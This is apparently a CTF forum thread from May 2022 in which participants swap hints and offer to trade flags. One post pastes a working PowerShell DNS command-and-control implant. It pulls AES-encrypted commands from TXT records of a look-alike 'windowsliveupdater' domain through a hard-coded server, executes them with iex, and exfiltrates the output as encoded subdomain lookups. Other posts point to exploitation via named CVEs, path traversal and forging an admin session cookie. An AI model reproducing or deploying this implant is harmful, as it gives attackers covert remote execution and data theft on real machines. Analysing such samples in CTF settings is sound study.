Anyone done any Hardware challenges??

In Automation, what to do?
# AES-CBC with zero padding; key and IV may be passed as base64 strings or byte arrays.
function Create-AesManagedObject($key, $IV) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    if ($IV) {
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        } else {
            $aesManaged.IV = $IV
        }
    }
    if ($key) {
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        } else {
            $aesManaged.Key = $key
        }
    }
    $aesManaged
}

function Create-AesKey() {
    $aesManaged = Create-AesManagedObject $key $IV
    [System.Convert]::ToBase64String($aesManaged.Key)
}

# Outbound direction: random IV || ciphertext, returned as uppercase hex without dashes.
function Encrypt-String($key, $unencryptedString) {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged = Create-AesManagedObject $key
    $encryptor = $aesManaged.CreateEncryptor()
    $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    [System.BitConverter]::ToString($fullData).replace("-","")
}

# Inbound direction: base64(IV || ciphertext); the first 16 bytes are the IV.
function Decrypt-String($key, $encryptedStringWithIV) {
    $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV = $bytes[0..15]
    $aesManaged = Create-AesManagedObject $key $IV
    $decryptor = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
    $aesManaged.Dispose()
    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
}

# Split a string into chunks of $query characters (the last element may be empty).
filter parts($query) {
    $t = $_;
    0..[math]::floor($t.length / $query) | % { $t.substring($query * $_, [math]::min($query, $t.length - $query * $_)) }
}

$key = "a1E4MUtycWswTmtrMHdqdg=="
# Tasking is fetched from TXT records of the C2 domain via a hard-coded resolver.
$out = Resolve-DnsName -type TXT -DnsOnly windowsliveupdater.com -Server 147.182.172.189 | Select-Object -Property Strings;
for ($num = 0 ; $num -le $out.Length-2; $num++) {
    $encryptedString = $out[$num].Strings[0]
    $backToPlainText = Decrypt-String $key $encryptedString
    $output = iex $backToPlainText;
    # Command output goes back as 32-hex-char subdomain labels between start./end. markers.
    $pr = Encrypt-String $key $output | parts 32
    Resolve-DnsName -type A -DnsOnly start.windowsliveupdater.com -Server 147.182.172.189
    for ($ans = 0; $ans -lt $pr.length-1; $ans++) {
        $domain = -join($pr[$ans], ".windowsliveupdater.com")
        Resolve-DnsName -type A -DnsOnly $domain -Server 147.182.172.189
    }
    Resolve-DnsName -type A -DnsOnly end.windowsliveupdater.com -Server 147.182.172.189
}
Found this code, is this it??

(May 15, 2022, 09:54 PM) RustNood34 Wrote:
    (May 15, 2022, 05:53 PM) xemyll Wrote:
        (May 15, 2022, 05:08 PM) fa23fsed23 Wrote: cis hard for me, anyone have a hint? Of course it's related to imagemath.eval, but the exploitation vector is unknown to me.
        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
    (May 15, 2022, 02:03 AM) RustNood34 Wrote:
        (May 14, 2022, 06:49 PM) Spakey Wrote:
            (May 14, 2022, 05:24 PM) fa23fsed23 Wrote: On Mutation Lab you have to use CVE-2021-23631.
            What is the path to flag.txt? I repeated the ../ several times and nothing.
        You ever find the path? I'm stuck at the same point.
    First read /app/index.js. It looks like the last 5 lines are a way in over port 1337, but I'm still not sure how to actually make use of it.
Check dotenv-related stuff.

(May 16, 2022, 09:16 AM) xemyll Wrote: Check dotenv-related stuff.
But how to exploit it? Can you share a writeup?

(May 16, 2022, 10:05 AM) testing Wrote: But how to exploit it? Can you share a writeup?
I will, after the event, sorry )

(May 16, 2022, 09:16 AM) xemyll Wrote: Check dotenv-related stuff.
Do we use the secret key to create the session.sig? Been poking around looking for the flag, but it doesn't seem to be readable by the current web user.. Thought probably the way forward is forging admin's cookie.

(May 16, 2022, 11:11 AM) just4htb1337 Wrote: Do we use the secret key to create the session.sig? Been poking around looking for the flag, but it doesn't seem to be readable by the current web user.. Thought probably the way forward is forging admin's cookie.
Yes, we do. Read /app/routes/index.js.

(May 16, 2022, 11:20 AM) xemyll Wrote: Yes, we do. Read /app/routes/index.js.
Amidst Us?

Anyone for hardware challenges? Willing to trade other flags :)

(May 16, 2022, 12:04 PM) arbitron Wrote: Anyone for hardware challenges? Willing to trade other flags :)
Ping me

(May 14, 2022, 10:37 PM) Internetdreams Wrote: got all pwn and all hardware DM please